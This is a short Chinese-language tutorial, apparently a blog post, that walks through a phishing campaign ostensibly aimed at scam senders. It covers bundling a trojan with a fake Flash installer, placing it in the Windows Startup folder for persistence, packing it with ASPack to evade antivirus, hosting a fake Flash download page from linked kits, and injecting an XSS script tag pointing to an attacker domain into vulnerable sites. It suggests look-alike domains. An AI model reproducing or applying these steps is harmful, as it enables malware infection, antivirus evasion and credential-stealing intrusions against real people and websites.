前言
发现一个好玩的github项目,正好,最近手机上老是收到莫名的诈骗短信,我决定钓一波。
准备钓鱼套件https://github.com/r00tSe7en/Flash-Pop 美化版 https://github.com/hackxc/xss_flash 普通版
1.生成木马并捆绑flash的安装程序
将木马与flash安装程序捆绑一起
木马解压位置:windows的自启动目录,这个百度钓鱼钓时间长就知道了。你要高兴,放桌面都行。
这地方让对方下载后,不要急着让木马启动,电脑都会装杀毒,如果免杀不到位,一运行就凉了。所以开机启动是最保险。
C:ProgramDataMicrosoftWindowsStartMenuProgramsStartup
https://www.winrar.com.cn/ winrar下载地址
3、简单做一下木马免杀
我们选取的加壳软件是ASPack,语言改成中文。剩下打开木马,压缩就好了。
一般能免杀10天左右。
4、在文件index.html “立即下载位置”链接改为 木马名字 后缀。放到目录。(这个页面可以直接访问使用)
由于是中英文切换的所以英文页面也要改一下。
5、修改一下version.js文件中的链接,为自己的钓鱼页面。(主要与XSS直接配合使用)
6、我比较喜欢用宝塔,我们新建一个站点,填好域名,改为静态后,将源码放入对应的网站目录下。
没有服务器和域名怎么办 http://www.webweb.com/ 香港云可以白嫖
7、下面开始钓鱼
如果你想利用XSS钓鱼
可以使用src标签 构造payload:<scriptsrc="http://www.xx.com/Flash.cn/version.js"> </script>
提示:护网中最好使用域名相近的域名。
我们找一个存在XSS的网站,在存在异常的参数位置,输入构造的payload,点击确定后,就会跳转到我们钓鱼页面。
8、对方下载安装后,成功上线。
